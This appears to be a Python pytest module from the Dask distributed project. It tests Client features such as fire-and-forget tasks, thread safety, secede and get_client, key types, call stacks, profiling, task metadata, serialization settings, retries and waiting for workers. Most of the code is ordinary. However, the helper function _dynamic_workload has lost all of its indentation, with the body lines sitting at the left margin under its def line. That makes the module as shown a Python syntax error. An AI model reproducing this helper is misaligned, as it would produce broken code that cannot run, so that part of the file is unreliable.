@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
    """An errored fire-and-forget task is cleared from the scheduler quickly."""
    fire_and_forget(c.submit(div, 1, 0))
    await asyncio.sleep(0.1)
    # erred task should clear out quickly
    start = time()
    while s.tasks:
        await asyncio.sleep(0.01)
        assert time() < start + 1
def test_quiet_client_close(loop):
    """Closing a client mid-computation emits (almost) no log noise."""
    with captured_logger(logging.getLogger("distributed")) as logger:
        with Client(
            loop=loop,
            processes=False,
            dashboard_address=":0",
            threads_per_worker=4,
        ) as c:
            futures = c.map(slowinc, range(1000), delay=0.01)
            sleep(0.200)  # stop part-way
        sleep(0.1)  # let things settle
    out = logger.getvalue()
    lines = out.strip().split("\n")
    assert len(lines) <= 2
    for line in lines:
        assert (
            not line
            or "Reconnecting" in line
            or "garbage" in line
            or set(line) == {"-"}
        ), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
    """Closing the cluster before the client must not log CancelledError."""
    with captured_logger(logging.getLogger("tornado.application")) as logger:
        cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
        client = Client(cluster, loop=loop)
        cluster.close()
        client.close()
    out = logger.getvalue()
    assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
    """Closing a client removes its wants_what entries and its tasks."""
    c = await Client(s.address, asynchronous=True)
    future = c.submit(inc, 1)
    await wait(future)
    assert c.id in s.wants_what
    await c.close()
    while c.id in s.wants_what or s.tasks:
        await asyncio.sleep(0.01)
def test_threadsafe(c):
    """submit/gather may be called concurrently from many threads."""
    def f(_):
        # keep a bounded window of in-flight futures per thread
        d = deque(maxlen=50)
        for i in range(100):
            future = c.submit(inc, random.randint(0, 100))
            d.append(future)
            sleep(0.001)
        c.gather(list(d))
        total = c.submit(sum, list(d))
        return total.result()
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(20) as e:
        results = list(e.map(f, range(20)))
        assert results and all(results)
        del results
@pytest.mark.slow
def test_threadsafe_get(c):
    """Collection .compute() may be called concurrently from many threads."""
    da = pytest.importorskip("dask.array")
    x = da.arange(100, chunks=(10,))
    def f(_):
        total = 0
        for i in range(20):
            total += (x + random.randint(0, 20)).sum().compute()
            sleep(0.001)
        return total
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(30) as e:
        results = list(e.map(f, range(30)))
        assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
    """Client.compute may be called concurrently from many threads."""
    da = pytest.importorskip("dask.array")
    x = da.arange(100, chunks=(10,))
    def f(_):
        total = 0
        for i in range(20):
            future = c.compute((x + random.randint(0, 20)).sum())
            total += future.result()
            sleep(0.001)
        return total
    from concurrent.futures import ThreadPoolExecutor
    # FIX: use the executor as a context manager so its threads are joined
    # even when an assertion fails (matches test_threadsafe / test_threadsafe_get,
    # which previously leaked this executor).
    with ThreadPoolExecutor(30) as e:
        results = list(e.map(f, range(30)))
    assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
    """IDs of client, workers, and scheduler are prefixed with their role."""
    expectations = [(c, "client"), (a, "worker"), (b, "worker"), (s, "scheduler")]
    for obj, prefix in expectations:
        assert obj.id.lower().startswith(prefix)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
    """get_client() inside a task returns a synchronous view of the same
    client object, usable to submit further work."""
    assert get_client() is c
    assert c.asynchronous
    def f(x):
        client = get_client()
        future = client.submit(inc, x)
        import distributed
        assert not client.asynchronous
        # tmp_client is set below so the task can verify it got the same client
        assert client is distributed.tmp_client
        return future.result()
    import distributed
    distributed.tmp_client = c
    try:
        futures = c.map(f, range(5))
        results = await c.gather(futures)
        assert results == list(map(inc, range(5)))
    finally:
        del distributed.tmp_client
def test_get_client_no_cluster():
    """get_client() without a cluster or address raises a clear ValueError."""
    # Clean up any global workers added by other tests. This test requires that
    # there are no global workers.
    Worker._instances.clear()
    msg = "No global client found and no address provided"
    with pytest.raises(ValueError, match=fr"^{msg}$"):
        get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
    """A persisted collection can be passed as a task argument and arrives
    as a working collection on the worker."""
    da = pytest.importorskip("dask.array")
    x = da.arange(10, chunks=(5,)).persist()
    def f(x):
        assert isinstance(x, da.Array)
        return x.sum().compute()
    future = c.submit(f, x)
    result = await future
    assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1)
async def test_secede_simple(c, s, a):
    """secede() lets a task submit and wait on sub-tasks even on a
    single-thread worker."""
    def f():
        client = get_client()
        secede()
        return client.submit(inc, 1).result()
    result = await c.submit(f)
    assert result == 2
@gen_cluster(client=True)
async def test_secede_balances(c, s, a, b):
    """Ensure that tasks scheduled from a seceded thread can be scheduled
    elsewhere"""
    def f(x):
        client = get_client()
        secede()
        futures = client.map(inc, range(10), pure=False)
        total = client.submit(sum, futures).result()
        return total
    # all outer tasks start restricted to worker a
    futures = c.map(f, range(10), workers=[a.address])
    results = await c.gather(futures)
    # We dispatch 10 tasks and every task generates 11 more tasks
    # 10 * 11 + 10
    assert a.executed_count + b.executed_count == 120
    assert a.executed_count >= 10
    # sub-tasks must have spilled over to the unrestricted worker b
    assert b.executed_count > 0
    assert results == [sum(map(inc, range(10)))] * 10
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
    """A task submitted from inside a running task gets scheduling precedence
    over its parent (a lower priority value)."""
    def func():
        client = get_client()
        f = client.submit(slowinc, 1, delay=0.5, key="slowinc")
        client.gather(f)
    future = c.submit(func, key="f")
    while len(s.tasks) != 2:
        await asyncio.sleep(0.001)
    # lower values schedule first
    assert s.tasks["f"].priority > s.tasks["slowinc"].priority, (
        s.tasks["f"].priority,
        s.tasks["slowinc"].priority,
    )
def test_get_client_sync(c, s, a, b):
    """get_worker()/get_client() inside tasks point at this cluster's scheduler."""
    results = c.run(lambda: get_worker().scheduler.address)
    assert results == {w["address"]: s["address"] for w in [a, b]}
    results = c.run(lambda: get_client().scheduler.address)
    assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
    """A persisted dataframe can be scattered and round-trips intact."""
    pd = pytest.importorskip("pandas")
    dd = pytest.importorskip("dask.dataframe")
    from dask.dataframe.utils import assert_eq
    df = pd.DataFrame({"x": [1, 2, 3]})
    ddf = dd.from_pandas(df, npartitions=2).persist()
    future = await c.scatter(ddf)
    ddf2 = await future
    df2 = await c.compute(ddf2)
    assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
    """Synchronous variant: a scattered persisted dataframe round-trips and
    is usable both locally and inside tasks."""
    pd = pytest.importorskip("pandas")
    dd = pytest.importorskip("dask.dataframe")
    from dask.dataframe.utils import assert_eq
    df = pd.DataFrame({"x": [1, 2, 3]})
    ddf = dd.from_pandas(df, npartitions=2).persist()
    future = c.scatter(ddf)
    result = future.result()
    assert_eq(result.compute(), df)
    assert future.type == dd.DataFrame
    assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def test_dynamic_workloads_sync(c):
    """A task that recursively spawns sub-tasks computes the expected total."""
    future = c.submit(_dynamic_workload, 0, delay=0.02)
    assert future.result(timeout=20) == 52
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
    """Same as test_dynamic_workloads_sync but with randomized task durations."""
    future = c.submit(_dynamic_workload, 0, delay="random")
    assert future.result(timeout=20) == 52
@pytest.mark.xfail(COMPILED, reason="Fails with cythonized scheduler")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
    """Futures may use bytes keys end to end."""
    key = b"inc-123"
    future = c.submit(inc, 1, key=key)
    result = await future
    assert type(future.key) is bytes
    assert set(s.tasks) == {key}
    assert key in a.data or key in b.data
    assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
    """Futures may use ASCII str keys end to end."""
    uni_type = str
    key = "inc-123"
    future = c.submit(inc, 1, key=key)
    result = await future
    assert type(future.key) is uni_type
    assert set(s.tasks) == {key}
    assert key in a.data or key in b.data
    assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
    """Non-ASCII str keys work for submit, dependent tasks, and scatter."""
    uni_type = str
    key = "inc-123\u03bc"
    future = c.submit(inc, 1, key=key)
    result = await future
    assert type(future.key) is uni_type
    assert set(s.tasks) == {key}
    assert key in a.data or key in b.data
    assert result == 2
    future2 = c.submit(inc, future)
    result2 = await future2
    assert result2 == 3
    future3 = await c.scatter({"data-123": 123})
    result3 = await future3["data-123"]
    assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
    """A synchronous client can be driven from a coroutine via sync()."""
    async def f():
        x = await c.scatter(123)
        y = c.submit(inc, x)
        z = await c.gather(y)
        return z
    z = sync(loop, f)
    assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
    """Closing the cluster under a live client emits no distributed.comm logs."""
    loop = loop_in_thread
    with LocalCluster(loop=loop, dashboard_address=":0", silence_logs=False) as cluster:
        with captured_logger("distributed.comm") as sio:
            with Client(cluster, loop=loop) as client:
                futures = client.map(lambda x: x + 1, range(10))
                sleep(0.05)
                cluster.close()
                sleep(0.05)
    text = sio.getvalue()
    assert not text
def test_warn_executor(loop, s, a, b):
    """Instantiating the deprecated Executor alias warns, mentioning Client."""
    with warnings.catch_warnings(record=True) as record:
        with Executor(s["address"], loop=loop) as c:
            pass
    assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
    """call_stack for a single future reports only the worker executing it."""
    x = c.submit(slowdec, 1, delay=0.5)
    future = c.submit(slowinc, 1, delay=0.5)
    await asyncio.sleep(0.1)
    # Passing the future directly and passing keys= should be equivalent
    results = await asyncio.gather(
        c.call_stack(future), c.call_stack(keys=[future.key])
    )
    assert all(list(first(result.values())) == [future.key] for result in results)
    assert results[0] == results[1]
    result = results[0]
    # Work out which worker picked up the slowinc task
    ts = a.tasks.get(future.key)
    if ts is not None and ts.state == "executing":
        w = a
    else:
        w = b
    assert list(result) == [w.address]
    assert list(result[w.address]) == [future.key]
    assert "slowinc" in str(result)
    assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
    """call_stack() with no arguments covers the currently executing task."""
    future = c.submit(slowinc, 1, delay=0.8)
    while not a.executing_count and not b.executing_count:
        await asyncio.sleep(0.01)
    result = await c.call_stack()
    w = a if a.executing_count else b
    assert list(result) == [w.address]
    assert list(result[w.address]) == [future.key]
    assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
    """call_stack accepts a dask collection and returns a non-empty result."""
    da = pytest.importorskip("dask.array")
    x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
    while not a.executing_count and not b.executing_count:
        await asyncio.sleep(0.001)
    result = await c.call_stack(x)
    assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
    """call_stack() works while a collection's tasks are executing."""
    da = pytest.importorskip("dask.array")
    x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
    while not a.executing_count and not b.executing_count:
        await asyncio.sleep(0.001)
    result = await c.call_stack()
    assert result
@pytest.mark.flaky(condition=WINDOWS, reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
    """c.profile respects start/stop time windows and per-worker filtering."""
    futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
    await wait(futures)
    # A window entirely in the future captures nothing
    x = await c.profile(start=time() + 10, stop=time() + 20)
    assert not x["count"]
    # A window covering everything matches worker a's full profile history
    x = await c.profile(start=0, stop=time())
    assert (
        x["count"]
        == sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
    )
    # A short recent window captures a strict subset
    y = await c.profile(start=time() - 0.300, stop=time())
    assert 0 < y["count"] < x["count"]
    # All work was pinned to a; b should have recorded nothing
    assert not any(p["count"] for _, p in b.profile_history)
    result = await c.profile(workers=b.address)
    assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
    """Per-key profiles sum to the total; unknown keys yield an empty profile."""
    x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
    y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
    await wait(x + y)
    xp = await c.profile("slowinc")
    yp = await c.profile("slowdec")
    p = await c.profile()
    assert p["count"] == xp["count"] + yp["count"]
    # Profiling a nonexistent key returns an empty profile without logging
    with captured_logger(logging.getLogger("distributed")) as logger:
        prof = await c.profile("does-not-exist")
        assert prof == profile.create()
    out = logger.getvalue()
    assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
    """A client name= appears both in client.id and in scheduler logs."""
    with captured_logger("distributed.scheduler") as sio:
        client = await Client(s.address, asynchronous=True, name="foo")
        assert "foo" in client.id
        await client.close()
    text = sio.getvalue()
    assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
    """Future(key) without a client attaches to the default client."""
    x = c.submit(inc, 1)
    await wait(x)
    future = Future(x.key)
    assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
    """A Future created on a second client learns the task's finished state."""
    x = c.submit(inc, 1)
    await wait(x)
    client = await Client(s.address, asynchronous=True)
    future = Future(x.key, client)
    while future.status != "finished":
        await asyncio.sleep(0.01)
    await client.close()
def test_client_async_before_loop_starts():
    """An asynchronous client can be constructed before its loop is running."""
    with pristine_loop() as loop:
        client = Client(asynchronous=True, loop=loop)
        assert client.asynchronous
        client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
    """Tasks may recursively call compute() on workers (fib via delayed)."""
    def fib(x):
        # Running inside a task, so the worker must know its current task
        assert get_worker().get_current_task()
        if x < 2:
            return x
        a = delayed(fib)(x - 1)
        b = delayed(fib)(x - 2)
        c = a + b
        return c.compute()
    future = c.submit(fib, 8)
    result = await future
    assert result == 21
    assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
    """set_metadata/get_metadata round-trip values, including nested keys."""
    await c.set_metadata("x", 1)
    result = await c.get_metadata("x")
    assert result == 1
    future = c.submit(inc, 1)
    key = future.key
    await wait(future)
    await c.set_metadata(key, 123)
    result = await c.get_metadata(key)
    assert result == 123
    # Metadata keyed by a task key is cleaned up when the task is forgotten
    del future
    while key in s.tasks:
        await asyncio.sleep(0.01)
    with pytest.raises(KeyError):
        await c.get_metadata(key)
    result = await c.get_metadata(key, None)
    assert result is None
    # List keys address nested metadata dictionaries
    await c.set_metadata(["x", "a"], 1)
    result = await c.get_metadata("x")
    assert result == {"a": 1}
    await c.set_metadata(["x", "b"], 2)
    result = await c.get_metadata("x")
    assert result == {"a": 1, "b": 2}
    result = await c.get_metadata(["x", "a"])
    assert result == 1
    # Deep assignment replaces the existing scalar at x.a with nesting
    await c.set_metadata(["x", "a", "c", "d"], 1)
    result = await c.get_metadata("x")
    assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
    """Scheduler, worker, and nanny logs are retrievable and well-formed."""
    await wait(c.map(inc, range(5)))
    logs = await c.get_scheduler_logs(n=5)
    assert logs
    for _, msg in logs:
        assert "distributed.scheduler" in msg
    w_logs = await c.get_worker_logs(n=5)
    assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
    for log in w_logs.values():
        for _, msg in log:
            assert "distributed.worker" in msg
    n_logs = await c.get_worker_logs(nanny=True)
    assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
    for log in n_logs.values():
        for _, msg in log:
            assert "distributed.nanny" in msg
    # workers= restricts nanny logs to the requested worker only
    n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
    assert set(n_logs.keys()) == {a.worker_address}
    for log in n_logs.values():
        for _, msg in log:
            assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
    """compute() on a delayed does not add an extra finalize task."""
    x = delayed(inc)(1)
    future = c.compute(x)
    result = await future
    assert result == 2
    # Only the original task key should exist on the scheduler
    assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
    """The scheduler-address config key is honored and logged by the client."""
    with dask.config.set({"scheduler-address": s.address}):
        with captured_logger("distributed.client") as sio:
            c = await Client(asynchronous=True)
            assert c.scheduler.address == s.address
        text = sio.getvalue()
        assert s.address in text
        await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
    """Submitting a large value warns once, with a truncated repr."""
    with warnings.catch_warnings(record=True) as record:
        future = c.submit(lambda x: x + 1, b"0" * 2000000)
        text = str(record[0].message)
        # Size formatting differs across dask versions (MB vs MiB)
        assert "2.00 MB" in text or "1.91 MiB" in text
        assert "large" in text
        assert "..." in text
        assert "'000" in text
        assert "000'" in text
        assert len(text) < 2000
    # Re-submitting the same large value should not warn repeatedly
    with warnings.catch_warnings(record=True) as record:
        data = b"0" * 2000000
        for i in range(10):
            future = c.submit(lambda x, y: x, data, i)
    assert len(record) < 2
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
    """Unhashable callables can still be submitted and run."""
    func = _UnhashableCallable()
    result = await c.submit(func, 1)
    assert result == 2
@gen_cluster()
async def test_client_name(s, a, b):
    """The client-name config value shows up in the scheduler's client list."""
    with dask.config.set({"client-name": "hello-world"}):
        c = await Client(s.address, asynchronous=True)
        assert any("hello-world" in name for name in list(s.clients))
        await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
    """A client given an external loop leaves it usable after closing."""
    with Client(s["address"], loop=loop_in_thread) as c:
        assert c.submit(inc, 1).result() == 2
    # Second client on the same loop still works
    with Client(s["address"], loop=loop_in_thread) as c:
        assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
    """Losing the scheduler does not log BrokenPipeError on the client."""
    c._periodic_callbacks["scheduler-info"].interval = 10
    with captured_logger(logging.getLogger("distributed.client")) as logger:
        await s.close()
        await c._update_scheduler_info()
    text = logger.getvalue()
    assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
    """dashboard_link renders the configured template with env vars and port."""
    monkeypatch.setenv("USER", "myusername")
    with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
        with Client(s["address"], loop=loop) as c:
            with dask.config.set(
                {"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
            ):
                link = "http://foo-myusername:12355/status"
                assert link == c.dashboard_link
                text = c._repr_html_()
                assert link in text
@gen_test()
async def test_dashboard_link_inproc():
    """A host-only link template renders without slashes for inproc clusters."""
    async with Client(processes=False, asynchronous=True, dashboard_address=":0") as c:
        with dask.config.set({"distributed.dashboard.link": "{host}"}):
            assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
    """Connecting to a dead address fails fast and leaves the client closed."""
    with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
        start = time()
        c = Client("127.0.0.1:3755", asynchronous=True)
        with pytest.raises((TimeoutError, IOError)):
            await c
        stop = time()
        assert c.status == "closed"
        await c.close()
        # With a 10ms connect timeout, failure should be near-immediate
        assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
    """Connecting to a live but non-dask HTTP port times out cleanly."""
    import tornado.httpserver
    import tornado.web
    application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
    http_server = tornado.httpserver.HTTPServer(application)
    http_server.listen(8080)
    with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
        c = Client("127.0.0.1:8080", asynchronous=True)
        with pytest.raises((TimeoutError, IOError)):
            await c
        await c._close(fast=True)
    http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
    """With pickle disabled, tasks run but complex payloads fail to (de)serialize."""
    @gen_cluster()
    async def test(s, a, b):
        np = pytest.importorskip("numpy")
        async with Client(
            s.address, asynchronous=True, serializers=["dask", "msgpack"]
        ) as c:
            assert (await c.submit(inc, 1)) == 2
            await c.submit(np.ones, 5)
            await c.scatter(1)
            # Can't send complex data
            with pytest.raises(TypeError):
                future = await c.scatter(inc)
            # can send complex tasks (this uses pickle regardless)
            future = c.submit(lambda x: x, inc)
            await wait(future)
            # but can't receive complex results
            with pytest.raises(TypeError):
                await c.gather(future, direct=direct)
            # Run works
            result = await c.run(lambda: 1)
            assert list(result.values()) == [1, 1]
            result = await c.run_on_scheduler(lambda: 1)
            assert result == 1
            # But not with complex return values
            with pytest.raises(TypeError):
                await c.run(lambda: inc)
            with pytest.raises(TypeError):
                await c.run_on_scheduler(lambda: inc)
    test()
@gen_cluster()
async def test_de_serialization(s, a, b):
    """msgpack-only deserializers reject data that was pickled on the way in."""
    np = pytest.importorskip("numpy")
    c = await Client(
        s.address,
        asynchronous=True,
        serializers=["msgpack", "pickle"],
        deserializers=["msgpack"],
    )
    try:
        # Can send complex data
        future = await c.scatter(np.ones(5))
        # But can not retrieve it
        with pytest.raises(TypeError):
            result = await future
    finally:
        await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
    """deserializers=['msgpack'] alone (default serializers) rejects pickled data."""
    np = pytest.importorskip("numpy")
    c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
    try:
        # Can send complex data
        future = await c.scatter(np.ones(5))
        # But can not retrieve it
        with pytest.raises(TypeError):
            result = await future
    finally:
        await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
    """_repr_html_ must not raise on an already-closed asynchronous client."""
    c = await Client(s.address, asynchronous=True)
    await c.close()
    c._repr_html_()
def test_client_repr_closed_sync(loop):
    """_repr_html_ must not raise on an already-closed synchronous client."""
    with Client(loop=loop, processes=False, dashboard_address=":0") as c:
        pass
    c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
    """Scheduler priorities of tuple-keyed tasks follow dask.order ordering."""
    x = delayed(inc)(1, dask_key_name=("a", 2))
    y = delayed(inc)(2, dask_key_name=("a", 10))
    o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
    fx, fy = c.compute([x, y])
    await wait([fx, fy])
    assert (o[x.key] < o[y.key]) == (
        s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
    )
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
    """An erred task whose scattered input was released stays erred.

    Regression test for https://github.com/dask/distributed/issues/2038
    """
    def bad_fn(x):
        raise Exception("lol")
    x = await c.scatter(1)
    y = c.submit(bad_fn, x)
    del x
    await wait(y)
    assert y.status == "error"
    await asyncio.sleep(0.1)
    assert y.status == "error"  # not cancelled
@pytest.mark.xfail(reason="GH#5409 Dask-Default-Threads are frequently detected")
def test_no_threads_lingering():
    """Diagnostic check: fail and dump threads if too many are left running."""
    if threading.active_count() < 40:
        return
    active = dict(threading._active)
    print(f"==== Found {len(active)} active threads: ====")
    for t in active.values():
        print(t)
    assert False
@gen_cluster()
async def test_direct_async(s, a, b):
    """The direct_to_workers constructor flag is stored as passed."""
    c = await Client(s.address, asynchronous=True, direct_to_workers=True)
    assert c.direct_to_workers
    await c.close()
    c = await Client(s.address, asynchronous=True, direct_to_workers=False)
    assert not c.direct_to_workers
    await c.close()
def test_direct_sync(c):
    """The test client has direct transfers off; a worker-side get_client()
    reports a truthy direct_to_workers flag."""
    assert not c.direct_to_workers

    def worker_side_flag():
        return get_client().direct_to_workers

    assert c.submit(worker_side_flag).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
    """Futures from one client cannot be submitted through another client."""
    c1 = await Client(s.address, asynchronous=True)
    c2 = await Client(s.address, asynchronous=True)
    future = c1.submit(inc, 1)
    with pytest.raises(ValueError):
        c2.submit(inc, future)
    assert not c2.futures  # Don't create Futures on second Client
    await c1.close()
    await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
    """Delayed values with tuple dask_key_name values compute correctly."""
    x = dask.delayed(inc)(1, dask_key_name=("x", 1))
    y = dask.delayed(inc)(x, dask_key_name=("y", 1))
    result = await c.compute(y)
    assert result == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
    """Concurrent direct scatters of the same value all resolve (awaiting twice is safe)."""
    futures = await asyncio.gather(*(c.scatter(1, direct=True) for _ in range(5)))
    x = await futures[0]
    x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
    """A large ndarray kwarg to map becomes one shared task, not 100 copies."""
    np = pytest.importorskip("numpy")
    x = np.random.random(100000)
    futures = c.map(lambda a, b: a + b, range(100), b=x)
    while not s.tasks:
        await asyncio.sleep(0.01)
    # 100 mapped tasks plus a single task holding the shared array
    assert len(s.tasks) == 101
    assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
    """future.retry() re-runs a failed task, picking up new config."""
    def f():
        assert dask.config.get("foo")
    with dask.config.set(foo=False):
        future = c.submit(f)
        with pytest.raises(AssertionError):
            await future
    with dask.config.set(foo=True):
        await future.retry()
        await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
    """retry on a dependent task re-runs its failed dependency; retrying
    finished tasks is harmless."""
    def f():
        return dask.config.get("foo")
    x = c.submit(f)
    y = c.submit(inc, x)
    with pytest.raises(KeyError):
        await y
    with dask.config.set(foo=100):
        await y.retry()
        result = await y
        assert result == 101
        # Retrying already-successful tasks keeps the same result
        await y.retry()
        await x.retry()
        result = await y
        assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
    """retry recomputes a dependency whose future was released by the client."""
    def f(x):
        return dask.config.get("foo") + 1
    x = c.submit(inc, 1, key="x")
    y = c.submit(f, x, key="y")
    del x
    with pytest.raises(KeyError):
        await y
    with dask.config.set(foo=100):
        await y.retry()
        result = await y
        assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
    """c.profile(plot=True) yields a bokeh Model; filename= writes a file."""
    pytest.importorskip("bokeh.plotting")
    from bokeh.model import Model
    await c.gather(c.map(slowinc, range(10), delay=0.2))
    state, figure = await c.profile(plot=True)
    assert isinstance(figure, Model)
    with tmpfile("html") as fn:
        try:
            await c.profile(filename=fn)
        except PermissionError:
            if WINDOWS:
                pytest.xfail()
        assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
    """SubgraphCallables may embed futures, including when nested."""
    future = c.submit(add, 1, 2)
    subgraph = SubgraphCallable(
        {"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
    )
    dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
    future2 = c.get(dsk, "d", sync=False)
    result = await future2
    assert result == 11
    # Nested subgraphs
    subgraph2 = SubgraphCallable(
        {
            "_2": (subgraph, "_0", "_1"),
            "_3": (subgraph, "_2", "_1"),
            "_4": (add, "_3", future2),
        },
        "_4",
        ("_0", "_1"),
    )
    dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
    result = await c.get(dsk2, "g", sync=False)
    assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
    """Futures mixed with SubgraphCallables work in dask.dataframe graphs."""
    dd = pytest.importorskip("dask.dataframe")
    import pandas as pd
    df = pd.DataFrame({"x": range(1, 11)})
    ddf = dd.from_pandas(df, npartitions=2).persist()
    # Repeated map_partitions + astype builds layered subgraphs over futures
    ddf = ddf.map_partitions(lambda x: x)
    ddf["x"] = ddf["x"].astype("f8")
    ddf = ddf.map_partitions(lambda x: x)
    ddf["x"] = ddf["x"].astype("f8")
    result = await c.compute(ddf)
    assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
    """direct_to_workers gathers bypass the scheduler's gather machinery."""
    with Client(s["address"], loop=loop, direct_to_workers=True) as client:
        future = client.scatter(1)
        future.result()
        resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
        # No "gather" event should appear on the scheduler
        assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
    """Instance registries track the live client, scheduler, and workers."""
    assert list(Client._instances) == [c]
    assert list(Scheduler._instances) == [s]
    assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
    """wait_for_workers blocks until n workers exist, and times out with detail."""
    future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
    await asyncio.sleep(0.22)  # 2 chances
    assert not future.done()
    w = await Worker(s.address)
    start = time()
    await future
    assert time() < start + 1
    await w.close()
    # Timeout message includes current/requested counts and the timeout value
    with pytest.raises(TimeoutError) as info:
        await c.wait_for_workers(n_workers=10, timeout="1 ms")
    assert "2/10" in str(info.value).replace(" ", "")
    assert "1 ms" in str(info.value)
